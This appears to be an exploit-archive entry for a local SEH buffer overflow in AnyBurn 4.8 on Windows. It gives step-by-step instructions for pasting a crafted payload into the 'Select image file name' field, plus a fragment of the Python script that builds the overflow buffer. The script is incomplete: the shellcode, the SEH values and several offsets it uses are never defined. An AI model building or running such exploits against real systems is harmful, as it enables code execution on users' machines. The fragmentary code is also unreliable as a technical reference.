Exploits / Vulnerability Discovered : 2020-03-13 |
Type : local |
Platform : windows
This exploit / vulnerability Anyburn 4.8 buffer overflow (seh) is for educational purposes only and if it is used you will do on your own risk!
# Steps to Produce the Exploit:
# 1.- Run python code
# 2.- Open payload.txt and copy content to clipboard
# 3.- Open AnyBurn choose 'Copy disk to image file'
# 4.- Paste the content of payload.txt into the field: 'Select image file name'
# 5.- Click 'Create Now' and you will see a crash and the payload launch.
#Filler padding after payload code to bring us to nseh offset
#auto calculated in case payload size changes
junk1 = "\x71" * int(nseh_offset-(len(junk)+len(buf)))
#Padding to take us to 10,000
padding = "\x71" * int(crash_buffer_size-(len(junk)+len(buf)+len(junk1)+len(nSeh)+len(seh)+len(eax_align)))
#Assembly of parts
print "\nAnyBurn Version 4.8 (32-bit) Exploit\n"
print "Software Link : http://www.anyburn.com/anyburn_setup.exe"
print "Exploit Authors: Richard Davy/Gary Nield"
print "Tested on: Windows 10 Enterprise x64"
print "Vulnerability Type: Buffer Overflow/SEH/Unicode\n"
print "Steps to Produce the Exploit:"
print "1.- Run python code"
print "2.- Open payload.txt and copy content to clipboard"
print "3.- Open AnyBurn choose 'Copy disk to image file'"
print "4.- Paste the content of payload.txt into the field: 'Select image file name'"
print "5.- Click 'Create Now' and you will see a crash and the payload launch.\n"